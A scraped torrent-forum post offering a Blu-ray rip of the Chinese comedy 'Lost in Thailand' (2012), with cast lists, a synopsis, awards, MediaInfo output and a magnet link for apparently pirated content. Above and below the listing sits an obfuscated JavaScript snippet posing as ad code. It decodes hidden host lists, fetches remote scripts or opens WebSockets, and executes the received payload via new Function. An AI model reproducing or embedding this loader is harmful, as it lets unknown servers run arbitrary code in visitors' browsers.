人再囧途之泰囧[国语配音/中文字幕].Lost.In.Thailand.2012.1080p.BluRay.x265.10bit.DTS 5.68GB

版主小s 1月前 152

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 人再囧途之泰囧 / 泰囧 / 人在囧途2 / Lost in Thailand
◎年  代 2012
◎产  地 中国大陆
◎类  别 喜剧
◎语  言 汉语普通话 / 英语 / 泰语
◎上映日期 2012-12-12(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt2459022/
◎豆瓣评分 7.5/10 (699209人评价)
◎豆瓣链接 https://movie.douban.com/subject/10574622/
◎片  长 105分钟
◎导  演 徐峥 Zheng Xu (id:1274297)
◎编  剧 徐峥 Zheng Xu (id:1274297)
       丁丁 Ding Ding (id:1325105)
       束焕 Huan Shu (id:1325104)
◎演  员 徐峥 Zheng Xu (id:1274297)
       王宝强 Baoqiang Wang (id:1274388)
       黄渤 Bo Huang (id:1274242)
       陶虹 Hong Tao (id:1015199)
       谢楠 Nan Xie (id:1313761)
       范冰冰 Bingbing Fan (id:1050059)
       陈祉希 Zhixi Chen (id:1337247)
        Rose (id:1351741)
       尹思勰 Sixie Yin (id:1427984)
       徐峥 Zheng Xu (id:1274297)
       王长田 Changtian Wang (id:1356370)
       刘瑞芳 Ruifang Liu (id:1396881)
       尹思勰 Sixie Yin (id:1427984)
       李晓萍 Xiaoping Li (id:1397479)
       陈志良 Chi-leung Chan (id:1397480)
       邢爱娜 Aina Xing (id:1312749)
       陈祉希 Zhixi Chen (id:1337247)
       赵英俊 Yingjun Zhao (id:1315474)
       豪伊 Howie B. (id:1397476)
       邓讴歌 Ou Ge Deng (id:1397475)
       宋晓飞 Xiaofei Song (id:1325035)
       屠亦然 Yiran Tu (id:1370751)
       郝艺 Yi Hao (id:1316581)
       郝艺 Yi Hao (id:1316581)
       董旭 Xu Dong (id:1364417)
       章嘉 Jia Zhang (id:1450764)
       李志杰 Chi Kit Lee (id:1397478)
       陈硕 Stone Chan (id:1397477)
       陈清銮 Meehz Chen (id:1440372)

◎标  签 喜剧 / 搞笑 / 贺岁 / 2012 / 泰国 / 恶搞 / 公路 / 温情

◎简  介
  商业成功人士徐朗(徐峥 饰)用了五年时间发明了一种叫“油霸”的神奇产品——每次汽车加油只需加到三分之二,再滴入2滴“油霸”,油箱的汽油就会变成满满一箱。徐朗的同学,兼商业竞争对手高博(黄渤 饰)想把这个发明一次性卖给法国人。但徐朗坚决不同意,他希望深入开发研究, 把“油霸”发扬光大,得到更远的收益。两个人各抒己见,争论不休,一直无果。由于两人股份相同,唯有得到公司最大股东周扬的授权书,方可达到各自目的。当得知周扬在泰国后,徐朗立刻启程寻找。而高博获悉后将一枚跟踪器放在徐朗身上一起去了泰国。飞机上,徐朗遇到了王宝(王宝强 饰),别有心机地想利用他来摆脱对手高博的追赶,可他不仅没甩掉王宝,还成了他的“贴身保姆”……                                    
                                究竟徐朗和高博谁会最终拿到周扬的授权书?而三个各怀目的的人,又将带来一段如何爆笑的泰国神奇之旅?

◎获奖情况 (共14项)
  第33届香港电影金像奖 (2014)
  最佳两岸华语电影(提名)

  第32届大众电影百花奖 (2014)
  最佳男主角(提名)
   └──徐峥 (id:1274297)
  最佳女配角(提名)
   └──陶虹 (id:1015199)

  第15届中国电影华表奖 (2013)
  优秀新人导演奖
   └──徐峥 (id:1274297)

  第7届亚洲电影大奖 (2013)
  最高票房亚洲电影大奖

  第13届华语电影传媒大奖 (2013)
  百家传媒年度致敬电影人(提名)
   └──徐峥 (id:1274297)
  百家传媒年度致敬电影(提名)
  观众票选最受瞩目电影

  第20届北京大学生电影节 (2013)
  最佳观赏效果奖(提名)
  最受大学生欢迎导演
   └──徐峥 (id:1274297)
  最受大学生欢迎男演员
   └──王宝强 (id:1274388)

  第3届豆瓣电影鑫像奖 (2013)
  鑫豆单元 最佳影片(华语)(提名)
  鑫豆单元 最佳喜剧片(提名)
  豆渣单元 最渣男演员(华语)(提名)
   └──王宝强 (id:1274388)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 139405251906203563611013183954625536598 (0x68E07993617297B9478810D83CBCA256)
  4. Complete name                            : [email protected]OM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.68 GiB
  8. Duration                                 : 1 h 45 min
  9. Overall bit rate                         : 7 739 kb/s
  10. Encoded date                             : UTC 2021-09-22 03:49:47
  11. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 45 min
  20. Bit rate                                 : 6 198 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 820 pixels
  23. Display aspect ratio                     : 2.35:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.164
  30. Stream size                              : 4.55 GiB (80%)
  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  32. Encoding settings                        : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x820 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  33. Default                                  : Yes
  34. Forced                                   : No
  35. Audio
  36. ID                                       : 2
  37. Format                                   : DTS
  38. Format/Info                              : Digital Theater Systems
  39. Codec ID                                 : A_DTS
  40. Duration                                 : 1 h 45 min
  41. Bit rate mode                            : Constant
  42. Bit rate                                 : 1 510 kb/s
  43. Channel(s)                               : 6 channels
  44. Channel layout                           : C L R Ls Rs LFE
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 93.750 FPS (512 SPF)
  47. Bit depth                                : 24 bits
  48. Compression mode                         : Lossy
  49. Stream size                              : 1.11 GiB (20%)
  50. Language                                 : Chinese
  51. Default                                  : Yes
  52. Forced                                   : No
  53. Text #1
  54. ID                                       : 3
  55. ID in the original source medium         : 4608 (0x1200)
  56. Format                                   : PGS
  57. Muxing mode                              : zlib
  58. Codec ID                                 : S_HDMV/PGS
  59. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  60. Duration                                 : 1 h 40 min
  61. Bit rate                                 : 26.9 kb/s
  62. Count of elements                        : 2936
  63. Stream size                              : 19.3 MiB (0%)
  64. Title                                    : chs
  65. Language                                 : Chinese
  66. Default                                  : Yes
  67. Forced                                   : No
  68. Original source medium                   : Blu-ray
  69. Text #2
  70. ID                                       : 4
  71. ID in the original source medium         : 4609 (0x1201)
  72. Format                                   : PGS
  73. Muxing mode                              : zlib
  74. Codec ID                                 : S_HDMV/PGS
  75. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  76. Duration                                 : 1 h 40 min
  77. Bit rate                                 : 39.3 kb/s
  78. Count of elements                        : 2936
  79. Stream size                              : 28.1 MiB (0%)
  80. Title                                    : eng
  81. Language                                 : English
  82. Default                                  : No
  83. Forced                                   : No
  84. Original source medium                   : Blu-ray
  85. Menu
  86. 00:00:00.000                             : 第 01 章
  87. 00:10:27.627                             : 第 02 章
  88. 00:20:11.210                             : 第 03 章
  89. 00:30:10.809                             : 第 04 章
  90. 00:41:34.492                             : 第 05 章
  91. 00:51:33.090                             : 第 06 章
  92. 01:00:08.605                             : 第 07 章
  93. 01:10:46.242                             : 第 08 章
  94. 01:19:54.790                             : 第 09 章
  95. 01:37:04.819                             : 第 10 章


TAGS 喜剧

磁力链:
  • magnet:?xl=19424&xt=urn:btih:3BD03D40C22A999E203683665224C0A9EE222279

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};